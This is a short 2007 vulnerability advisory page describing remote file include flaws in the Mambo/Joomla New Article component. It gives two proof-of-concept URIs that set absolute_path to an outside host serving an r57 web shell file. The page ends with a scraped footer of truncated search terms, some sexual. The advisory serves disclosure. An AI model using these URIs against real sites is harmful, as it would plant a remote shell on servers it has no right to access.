about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Mambo/Joomla New Article Component Absolute_Path Multiple Remote File Include Vulnerabilities


Title Mambo/Joomla New Article Component Absolute_Path Multiple Remote File Include Vulnerabilities
Published 2007-04-16-12:00AM
Updated 2007-04-17-03:11AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Cold z3ro is credited with discovering these issues.
Vulnerable  Mambo New Article Component 1.1
Not Vulnerable  
Code   Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/joomla_path/components/com_articles.php?absolute_path=http://www.example2.com/r57.txt?
http://www.example.com/classes/html/com_articles.php?absolute_path=http://www.example2.com/r57.txt?
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 00:54:44 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
cpwrap www.animat /index.php SEXYNUDEGI 200 /compo tamil actr www.bj23.c how to exp news for c namita six netgear ba news for c xxxtarjan www.spark- nude pictu cPanel10 88BY88 www.xeso.c Kaspersky Condition SEXYSHAKIL mambo Remo news for c [img] armpits li SIGSECV cook www.wapmob SEX XXl zura 200 /compo linki park SMBA Sex.toon.c CMS is Fre tieba.baid TIT zoorbezan. news for c Www.camasu drawing ob webspell+2 www.dafax. pes+2006+c dina and h vbuletin http://www SMF 1.0. blackice-i nude pictu